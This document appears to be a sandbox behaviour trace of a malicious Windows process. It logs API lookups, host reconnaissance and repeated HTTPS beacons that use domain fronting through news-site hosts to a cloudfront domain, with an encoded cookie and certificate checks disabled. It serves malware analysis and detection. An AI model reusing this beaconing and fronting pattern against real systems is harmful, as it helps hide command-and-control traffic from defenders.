Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x73b911e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x73c80b80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x73b6d400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x73b925a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x73ba2410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x73b9ff90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x73b9b210 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x76470000 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x72d90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x72da9540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_A, address_out = 0x72dd5aa0 True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x72d60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetIfEntry, address_out = 0x72d65c00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetIpAddrTable, address_out = 0x72d7f240 True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x73b00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = LsaCallAuthenticationPackage, address_out = 0x742a3b10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = LsaConnectUntrusted, address_out = 0x742a3900 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = LsaLookupAuthenticationPackage, address_out = 0x742a3a10 True 1
Fn
System Get Time type = System Time, time = 2018-02-15 18:29:37 (UTC) True 1
Fn
System Get Time type = Ticks, time = 130234 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76bda330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76bd7580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76bd9910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76bdf400 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Get Filename process_name = c:\windows\syswow64\explorer.exe, file_name_orig = C:\Windows\SysWOW64\explorer.exe, size = 260 True 1
Fn
System Get Time type = System Time, time = 2018-02-15 18:29:37 (UTC) True 1
Fn
Keyboard Get Info type = KB_CODEPAGE, result_out = 437 True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:37 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 130531 True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x76bd96e0 True 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = LHnIwsj, address_out = 192.168.0.237 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:40 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:40 (Local Time) True 1
Fn
System Sleep duration = 12318 milliseconds (12.318 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:51 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:51 (Local Time) True 1
Fn
System Sleep duration = 14821 milliseconds (14.821 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:02 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:02 (Local Time) True 1
Fn
System Sleep duration = 13167 milliseconds (13.167 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:14 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:14 (Local Time) True 1
Fn
System Sleep duration = 14846 milliseconds (14.846 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:25 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:25 (Local Time) True 1
Fn
System Sleep duration = 13753 milliseconds (13.753 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:36 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:36 (Local Time) True 1
Fn
System Sleep duration = 13554 milliseconds (13.554 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:47 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:47 (Local Time) True 1
Fn
System Sleep duration = 13968 milliseconds (13.968 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:57 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:30:57 (Local Time) True 1
Fn
System Sleep duration = 14658 milliseconds (14.658 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:31:08 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:31:08 (Local Time) True 1
Fn
System Sleep duration = 12283 milliseconds (12.283 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:31:19 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:31:19 (Local Time) True 1
Fn
System Sleep duration = 12105 milliseconds (12.105 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:31:29 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:31:29 (Local Time) True 1
Fn
System Sleep duration = 12500 milliseconds (12.500 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:31:40 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:31:40 (Local Time) True 1
Fn
System Sleep duration = 13040 milliseconds (13.040 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
